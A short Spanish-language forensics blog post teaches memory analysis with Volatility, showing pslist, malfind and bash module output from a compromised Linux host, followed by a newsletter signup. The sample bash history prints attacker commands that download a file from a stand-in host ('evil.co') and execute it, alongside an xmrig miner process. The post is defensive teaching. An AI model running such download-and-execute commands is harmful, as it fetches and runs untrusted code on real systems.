~ / blog / dfir
DFIR

Análisis de memoria

La memoria RAM guarda la verdad que el disco esconde: procesos ocultos, conexiones, y hasta los comandos que el atacante escribió.

Volatility la analiza. pslist te da los procesos que estaban vivos al capturar.

netstat, las conexiones. malfind busca código inyectado en memoria.

Y el módulo bash, una joya, te reconstruye el historial de comandos del atacante. Captura la memoria antes de apagar el equipo, o pierdes todo esto.

# los comandos

analyst@dfir:~# vol -f mem.raw linux.pslistcopiar
1876 xmrig
1901 bash
1544 sshd
analyst@dfir:~# vol -f mem.raw linux.malfindcopiar
PID 1876 xmrig RWX injected region
analyst@dfir:~# vol -f mem.raw linux.bashcopiar
1901 bash wget http://evil.co/x
1901 bash chmod +x x; ./x
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.